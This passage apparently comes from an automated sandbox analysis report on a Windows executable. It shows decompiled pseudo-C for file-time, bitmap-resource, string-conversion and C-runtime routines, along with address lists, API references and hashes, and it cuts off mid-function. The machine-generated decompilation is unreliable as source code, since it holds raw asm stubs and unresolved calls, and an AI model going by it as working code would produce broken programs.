					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                0x00cc8749
                0x00cc8754
                0x00cc875b
                0x00cc875d
                0x00cc875d
                0x00cc875f
                0x00cc8768
                0x00cc876a
                0x00cc876f
                0x00cc8775
                0x00cc878b
                0x00cc8790
                0x00cc8793
                0x00cc87a0
                0x00cc87a5
                0x00cc87f9
                0x00cc8801
                0x00cc8803
                0x00cc8805
                0x00cc8808
                0x00cc8808
                0x00cc8808
                0x00cc880e
                0x00cc8816
                0x00cc8829
                0x00cc882c
                0x00cc882e
                0x00cc8831
                0x00cc8832
                0x00cc8853
                0x00cc8856
                0x00cc8856
                0x00cc8834
                0x00cc8834
                0x00cc8836
                0x00cc8841
                0x00cc8841
                0x00cc8843
                0x00cc884a
                0x00cc8845
                0x00cc8845
                0x00cc8845
                0x00cc8843
                0x00cc8857
                0x00cc8859
                0x00cc885a
                0x00cc885d
                0x00cc885f
                0x00cc8873
                0x00cc8861
                0x00cc8861
                0x00cc8861
                0x00cc8878
                0x00cc8878
                0x00cc887d
                0x00cc8880
                0x00cc888b
                0x00cc888b
                0x00cc888b
                0x00cc888b
                0x00cc888f
                0x00cc8896
                0x00cc8897
                0x00cc889a
                0x00cc889d
                0x00cc889d
                0x00cc889f
                0x00000000
                0x00000000
                0x00cc88b7
                0x00cc88be
                0x00cc88c2
                0x00cc88c5
                0x00cc88c8
                0x00cc88ca
                0x00cc88ca
                0x00cc88ca
                0x00cc88cc
                0x00cc88cf
                0x00cc88d2
                0x00cc88d4
                0x00cc88dc
                0x00cc88e2
                0x00cc88e5
                0x00cc88e8
                0x00cc88e9
                0x00cc88ec
                0x00cc88ef
                0x00cc88ef
                0x00cc88f4
                0x00cc88f7
                0x00000000
                0x00000000
                0x00cc890f
                0x00cc8914
                0x00cc8918
                0x00000000
                0x00000000
                0x00cc891c
                0x00cc891c
                0x00cc891f
                0x00cc8920
                0x00cc8920
                0x00cc8922
                0x00cc8925
                0x00000000
                0x00000000
                0x00cc8927
                0x00cc892a
                0x00cc8931
                0x00cc8934
                0x00cc8937
                0x00cc894d
                0x00cc894d
                0x00cc894d
                0x00cc8939
                0x00cc8939
                0x00cc893b
                0x00cc893e
                0x00cc8949
                0x00cc8940
                0x00cc8943
                0x00cc8943
                0x00cc893e
                0x00000000
                0x00cc8937
                0x00cc892c
                0x00cc892c
                0x00cc892e
                0x00cc892e
                0x00cc8882
                0x00cc8882
                0x00cc8885
                0x00cc8950
                0x00cc8950
                0x00cc8952
                0x00cc8954
                0x00cc8957
                0x00cc8958
                0x00cc8959
                0x00cc895a
                0x00cc8962
                0x00cc8962
                0x00cc8962
                0x00cc8964
                0x00cc8967
                0x00cc896a
                0x00cc896c
                0x00cc896c
                0x00cc896e
                0x00cc8980
                0x00cc8984
                0x00cc8987
                0x00cc898e
                0x00cc8996
                0x00cc8996
                0x00cc8999
                0x00cc899b
                0x00cc89ac
                0x00cc89ac
                0x00cc89b0
                0x00cc89b0
                0x00cc89b3
                0x00cc89b5
                0x00cc89b8
                0x00000000
                0x00cc899d
                0x00cc899d
                0x00cc89a3
                0x00cc89a3
                0x00cc89a7
                0x00cc89ba
                0x00cc89ba
                0x00cc89be
                0x00cc89bf
                0x00cc89c1
                0x00cc89c3
                0x00cc8a04
                0x00cc8a04
                0x00cc8a06
                0x00cc8a13
                0x00cc8a13
                0x00cc8a15
                0x00cc8a17
                0x00cc8a18
                0x00cc8a19
                0x00cc8a20
                0x00cc8a23
                0x00cc8a25
                0x00cc8a25
                0x00cc8a26
                0x00cc8a28
                0x00cc8a2b
                0x00cc8a2b
                0x00cc8a2d
                0x00cc8a2f
                0x00000000
                0x00cc8a2f
                0x00cc8a08
                0x00cc8a0a
                0x00000000
                0x00000000
                0x00cc8a0c
                0x00000000
                0x00000000
                0x00cc8a0e
                0x00cc8a11
                0x00000000
                0x00000000
                0x00000000
                0x00cc8a11
                0x00cc89ca
                0x00cc89d0
                0x00cc89d0
                0x00cc89d2
                0x00cc89d3
                0x00cc89d4
                0x00cc89d5
                0x00cc89dc
                0x00cc89df
                0x00cc89e1
                0x00cc89e2
                0x00cc89e4
                0x00cc89f1
                0x00cc89f1
                0x00cc89f3
                0x00cc89f5
                0x00cc89f6
                0x00cc89f7
                0x00cc89fe
                0x00cc8a01
                0x00cc8a03
                0x00cc8a03
                0x00000000
                0x00cc8a03
                0x00cc89e6
                0x00cc89e6
                0x00cc89e8
                0x00000000
                0x00000000
                0x00cc89ea
                0x00000000
                0x00000000
                0x00cc89ec
                0x00cc89ef
                0x00000000
                0x00000000
                0x00000000
                0x00cc89ef
                0x00cc89cc
                0x00cc89ce
                0x00000000
                0x00000000
                0x00000000
                0x00cc89ce
                0x00cc899f
                0x00cc89a1
                0x00000000
                0x00000000
                0x00000000
                0x00cc89a1
                0x00cc899b
                0x00000000
                0x00cc8885
                0x00cc8880
                0x00cc87a7
                0x00cc87a9
                0x00000000
                0x00cc87ab
                0x00cc87c1
                0x00cc87c6
                0x00cc87c8
                0x00cc87d4
                0x00cc87da
                0x00cc87db
                0x00cc87dd
                0x00cc87df
                0x00cc87ea
                0x00cc87ea
                0x00cc87ed
                0x00cc87ef
                0x00cc87ef
                0x00cc87f2
                0x00cc87ca
                0x00cc87ca
                0x00cc87ca
                0x00000000
                0x00cc87c8
                0x00cc8777
                0x00cc8777
                0x00cc877e
                0x00cc877f
                0x00cc8781
                0x00cc8a33
                0x00cc8a37
                0x00cc8a3c
                0x00cc8a3c
                0x00cc8a4b
                0x00cc8a4b

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                • Instruction ID: dea1bc856a489622252f47644fbe869718a9a044c73b3127b6e06dfb4495bdaa
                • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                • Instruction Fuzzy Hash: 3AA178329043869FDB21CF18C881FBFBBE1EF51310F28416EE4A59B282DA348E49C751
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9F96, Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00CA9F96(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E00CBD940();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00CA9E7F( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E00CAA12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00CB082F(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00CB082F(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00CB082F(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E00CAA12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E00CAB32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













                0x00ca9f96
                0x00ca9f9b
                0x00ca9fa7
                0x00ca9fae
                0x00ca9fb2
                0x00ca9fbf
                0x00ca9fbf
                0x00ca9fc3
                0x00ca9fc3
                0x00ca9fcc
                0x00ca9fd9
                0x00ca9fd9
                0x00ca9fdd
                0x00ca9fdd
                0x00ca9fe6
                0x00ca9ff4
                0x00ca9ff4
                0x00ca9ff8
                0x00ca9fff
                0x00caa004
                0x00caa00b
                0x00caa021
                0x00caa011
                0x00caa01a
                0x00caa01a
                0x00caa03c
                0x00caa042
                0x00caa049
                0x00caa093
                0x00caa098
                0x00caa0a1
                0x00caa0a1
                0x00caa0ab
                0x00caa0b4
                0x00caa0b4
                0x00caa0be
                0x00caa0c7
                0x00caa0c7
                0x00caa0d7
                0x00caa0db
                0x00caa0eb
                0x00caa0fb
                0x00caa101
                0x00caa108
                0x00caa110
                0x00caa11d
                0x00caa11d
                0x00000000
                0x00caa04b
                0x00caa05c
                0x00caa063
                0x00caa122
                0x00caa12c
                0x00caa12c
                0x00caa080
                0x00caa086
                0x00caa08d
                0x00000000
                0x00000000
                0x00000000
                0x00caa08d
                0x00caa049
                0x00ca9fee
                0x00ca9ff2
                0x00000000
                0x00000000
                0x00000000
                0x00ca9ff2
                0x00ca9fd3
                0x00ca9fd7
                0x00000000
                0x00000000
                0x00000000
                0x00ca9fd7
                0x00ca9fb9
                0x00ca9fbd
                0x00000000
                0x00000000
                0x00000000

                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00CA7F2C,?,?,?), ref: 00CAA03C
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00CA7F2C,?,?), ref: 00CAA080
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00CA7F2C,?,?,?,?,?,?,?,?), ref: 00CAA101
                • CloseHandle.KERNEL32(?,?,00000000,?,00CA7F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAA108
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 77789900b8a99de6dc9e8f85282cd65d085ff126951de99c2486eaaa09e9674f
                • Instruction ID: 473625c40e2f95f259d193d64f758a0814f156db69015d1d65700f39cfc3bc94
                • Opcode Fuzzy Hash: 77789900b8a99de6dc9e8f85282cd65d085ff126951de99c2486eaaa09e9674f
                • Instruction Fuzzy Hash: D041AD30248382AEE721DE64DC46BEEBBE8AB86308F040919B5E1D3191D774DA4CDB53
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCB5EA, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E00CCB5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xcdd668; // 0x814d2927
				_v8 = _t34 ^ _t70;
				E00CC3356(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x31e85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00CBE203(_t67, _v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00CBE920(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00CC980D(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00CC7A8A(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00CD0EE0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                0x00ccb5f2
                0x00ccb5f9
                0x00ccb605
                0x00ccb60a
                0x00ccb60f
                0x00ccb614
                0x00ccb614
                0x00ccb617
                0x00ccb619
                0x00ccb619
                0x00ccb61e
                0x00ccb637
                0x00ccb63d
                0x00ccb642
                0x00ccb6e1
                0x00ccb6e5
                0x00ccb6ea
                0x00ccb6ea
                0x00ccb706
                0x00ccb706
                0x00ccb648
                0x00ccb650
                0x00ccb654
                0x00ccb6a0
                0x00ccb6a2
                0x00ccb6a4
                0x00ccb6a9
                0x00ccb6c0
                0x00ccb6c8
                0x00ccb6d8
                0x00ccb6d8
                0x00ccb6c8
                0x00ccb6da
                0x00ccb6db
                0x00000000
                0x00ccb6e0
                0x00ccb65b
                0x00ccb65d
                0x00ccb65f
                0x00ccb667
                0x00ccb684
                0x00ccb68e
                0x00ccb693
                0x00000000
                0x00000000
                0x00ccb695
                0x00ccb69b
                0x00ccb69b
                0x00000000
                0x00ccb69b
                0x00ccb66b
                0x00ccb66f
                0x00ccb674
                0x00ccb678
                0x00000000
                0x00000000
                0x00ccb67a
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,31E85006,00CC34E6,00000000,00000000,00CC451B,?,00CC451B,?,00000001,00CC34E6,31E85006,00000001,00CC451B,00CC451B), ref: 00CCB637
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CCB6C0
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CCB6D2
                • __freea.LIBCMT ref: 00CCB6DB
                  • Part of subcall function 00CC7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: 0af3b4d8b8df3257599d640019aff3c0bdbe80a73c4d545178728acd484fcc7c
                • Instruction ID: 65b93e28bdf6ff3bd59a27f4920ab15339723aaa7c6f97cb8d0fcac854e757af
                • Opcode Fuzzy Hash: 0af3b4d8b8df3257599d640019aff3c0bdbe80a73c4d545178728acd484fcc7c
                • Instruction Fuzzy Hash: 6031BE72A0021AABDF298FA5CC46FAE7BA5EB40710F18416DFC14DB190E735DE51DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBA4F8, Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CBA4F8(void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0xce0060, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E00CB963A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E00CB952A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E00CB963A(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E00CB958C(_v20);
					_t13 = E00CB975D(_t21, _t32, _t22, E00CB9549(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}














                0x00cba4f8
                0x00cba4f8
                0x00cba50e
                0x00cba512
                0x00cba515
                0x00cba517
                0x00cba520
                0x00cba520
                0x00cba529
                0x00cba536
                0x00cba541
                0x00cba54a
                0x00cba54e
                0x00cba551
                0x00cba553
                0x00cba553
                0x00cba54e
                0x00cba558
                0x00cba568
                0x00cba570
                0x00cba572
                0x00cba574
                0x00cba57c

                APIs
                • LoadBitmapW.USER32(00000065), ref: 00CBA508
                • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBA529
                • DeleteObject.GDI32(00000000), ref: 00CBA551
                • DeleteObject.GDI32(00000000), ref: 00CBA570
                  • Part of subcall function 00CB963A: FindResourceW.KERNEL32(00000066,PNG,?,?,00CBA54A,00000066), ref: 00CB964B
                  • Part of subcall function 00CB963A: SizeofResource.KERNEL32(00000000,76B95B70,?,?,00CBA54A,00000066), ref: 00CB9663
                  • Part of subcall function 00CB963A: LoadResource.KERNEL32(00000000,?,?,00CBA54A,00000066), ref: 00CB9676
                  • Part of subcall function 00CB963A: LockResource.KERNEL32(00000000,?,?,00CBA54A,00000066), ref: 00CB9681
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                • String ID:
                • API String ID: 142272564-0
                • Opcode ID: 008b74697e391aeca1379fbfff92492ad207f20379a1eea3a523354ea5bed8f8
                • Instruction ID: 7d54c783510100930cd384a8364c861053ac340960de2eaee3ed951bf5d81d90
                • Opcode Fuzzy Hash: 008b74697e391aeca1379fbfff92492ad207f20379a1eea3a523354ea5bed8f8
                • Instruction Fuzzy Hash: 0601D63298161527C72277A89C46FFF77AEDF85B51F090111FB40F7291DE618E0A62A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC1A89, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 20%
                			E00CC1A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00CC20D8(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00CBF1DB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00CC22DA(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00CC1893(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00CBF1A9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












                0x00cc1a89
                0x00cc1a89
                0x00cc1a8c
                0x00cc1a91
                0x00cc1a94
                0x00cc1a96
                0x00cc1a99
                0x00cc1a9c
                0x00cc1a9d
                0x00cc1aa0
                0x00cc1aa5
                0x00cc1aa5
                0x00cc1aa8
                0x00cc1aac
                0x00cc1aaf
                0x00cc1ab4
                0x00cc1ab1
                0x00cc1ab1
                0x00cc1ab1
                0x00cc1ab7
                0x00cc1abd
                0x00cc1ac0
                0x00cc1ac2
                0x00cc1ac5
                0x00cc1ac8
                0x00cc1ac9
                0x00cc1ad2
                0x00cc1ad7
                0x00cc1ada
                0x00cc1ae0
                0x00cc1ae3
                0x00cc1ae6
                0x00cc1ae9
                0x00cc1aea
                0x00cc1aed
                0x00cc1af8
                0x00cc1afc
                0x00000000
                0x00cc1afc
                0x00cc1b03

                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 00CC1AA0
                  • Part of subcall function 00CC20D8: ___AdjustPointer.LIBCMT ref: 00CC2122
                • _UnwindNestedFrames.LIBCMT ref: 00CC1AB7
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00CC1AC9
                • CallCatchBlock.LIBVCRUNTIME ref: 00CC1AED
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID:
                • API String ID: 2633735394-0
                • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                • Instruction ID: 83b1e2aa85ec711a63e9fe4232684d1ed46a071d5a5f04d9a00c4d45a12cbbd9
                • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                • Instruction Fuzzy Hash: 7501D732400109BBCF129F96CC01EDA3BBAEF59754F198519FD1865121D372E9A2EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC15E6, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CC15E6() {
				void* _t4;
				void* _t8;

				E00CC29B7();
				E00CC294B();
				if(E00CC268E() != 0) {
					_t4 = E00CC1726(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00CC26CA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x00cc15e6
                0x00cc15eb
                0x00cc15f7
                0x00cc15fc
                0x00cc1601
                0x00cc1603
                0x00cc160e
                0x00cc1605
                0x00cc1605
                0x00000000
                0x00cc1605
                0x00cc15f9
                0x00cc15f9
                0x00cc15fb
                0x00cc15fb

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00CC15E6
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00CC15EB
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00CC15F0
                  • Part of subcall function 00CC268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00CC269F
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00CC1605
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                • Instruction ID: 526c13816a726127a3e8a48405e30aaf719c064507c54a417fd7159d79044359
                • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                • Instruction Fuzzy Hash: 48C048A8400642945C203AB7E313FAD13004DA37C9B8D24CEFD622B4239D26090B3A36
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB975D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
                Download Yara Rule
                C-Code - Quality: 51%
                			E00CB975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				char _v112;
				intOrPtr _v116;
				intOrPtr* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v144;
				intOrPtr* _v152;
				intOrPtr _v156;
				intOrPtr* _v164;
				char _v180;
				intOrPtr* _v184;
				intOrPtr* _v192;
				intOrPtr* _v200;
				intOrPtr* _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				char _v228;
				intOrPtr _v232;
				void* __edi;
				signed int _t71;
				intOrPtr* _t77;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t81;
				short _t89;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				signed int _t103;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				signed int _t120;
				intOrPtr _t124;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t146;
				void* _t149;
				signed int _t152;
				void* _t154;
				long long* _t155;
				long long _t158;

				_t158 = __fp0;
				if(E00CB960F() != 0) {
					_t146 = _a4;
